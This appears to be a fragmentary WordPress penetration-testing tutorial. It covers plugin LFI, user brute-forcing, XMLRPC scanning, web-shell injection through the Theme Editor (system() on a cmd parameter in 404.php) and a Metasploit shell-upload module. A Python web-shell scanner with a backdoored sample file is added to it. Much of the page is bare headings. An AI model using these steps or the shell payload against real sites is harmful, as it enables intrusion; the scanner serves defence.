Exploiting LFI in Plugin
Using Browser

We can also validate this vulnerability using cURL on the command line.
Using cURL
User Bruteforce
WPscan - XMLRPC
RCE via the Theme Editor
Attacking the WordPress Backend
Click on Appearance on the side panel and select Theme Editor. This page will allow us to edit the PHP source code directly. We should select an inactive theme in order to avoid corrupting the main theme.
Theme Editor

We can see that the active theme is Transportex so an unused theme such as Twenty Seventeen should be chosen instead.
Selecting Theme

Choose a theme and click on Select. Next, choose a non-critical file such as 404.php to modify and add a web shell.
Twenty Seventeen Theme - 404.php
In this example, we modified the source code of the 404.php page and added a call to the PHP system() function. This function lets us execute operating system commands directly: we send a GET request to the modified page, append a question mark ? and the cmd parameter to the end of the URL, and set it to the operating system command to run. The modified URL should look like this: 404.php?cmd=id.
RCE
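From the defensive side, the change described above leaves a clear artifact: a theme file that passes request input straight into a command-execution function. The following scanner is an added example, not code from the original page; it tokenizes PHP source with a regular expression for that exact pattern and runs it over two constructed 404.php samples (a clean one and one backdoored the way the text describes). Theme paths and file contents are assumptions.

```python
import re

# Constructed sample: the tail of an unmodified theme 404.php (assumed content)
CLEAN_404 = """<?php
get_header();
?>
<section class="error-404 not-found">
  <h1><?php _e( 'Oops! That page can&rsquo;t be found.', 'twentyseventeen' ); ?></h1>
</section>
<?php get_footer(); ?>
"""

# Constructed sample: the same file after a web shell was injected via the Theme Editor
BACKDOORED_404 = CLEAN_404.replace("get_header();", "get_header();\nsystem($_GET['cmd']);")

COMMAND_SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval")
SUPERGLOBALS = r"\$_(?:GET|POST|REQUEST|COOKIE)"

# Matches e.g. system($_GET['cmd']): a command sink fed directly from request input
SINK_RE = re.compile(
    r"\b(" + "|".join(COMMAND_SINKS) + r")\s*\(\s*" + SUPERGLOBALS + r"\s*\[",
    re.IGNORECASE,
)

def find_webshell_indicators(php_source: str):
    """Return (line_number, sink, line_text) for every line that pipes
    request input straight into a command-execution function."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        m = SINK_RE.search(line)
        if m:
            findings.append((lineno, m.group(1).lower(), line.strip()))
    return findings

def scan_theme_files(files: dict):
    """files maps a theme-relative path to its source text; only flagged files are returned."""
    return {path: hits for path, src in files.items() if (hits := find_webshell_indicators(src))}

if __name__ == "__main__":
    report = scan_theme_files({
        "twentyseventeen/404.php": BACKDOORED_404,   # assumed path
        "transportex/404.php": CLEAN_404,            # assumed path
    })
    for path, hits in report.items():
        for lineno, sink, text in hits:
            print(f"{path}:{lineno}: {sink}() called on request input -> {text}")
```

Pairing a scan like this with a file-integrity baseline of wp-content/themes catches edits made through the Theme Editor; defining DISALLOW_FILE_EDIT as true in wp-config.php removes the editor from the dashboard altogether.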
Metasploit
To obtain the reverse shell, we can use the wp_admin_shell_upload module. We can easily search for it inside MSF:
MSF Search
Attacking WordPress with Metasploit
The number 0 in the search results represents the ID for the suggested modules. From here on, we can specify the module by its ID number to save time.
Module Selection
Module Options
List Options
Exploitation
After using the set command to make the necessary modifications, we can use the run command to execute the module.
Set Options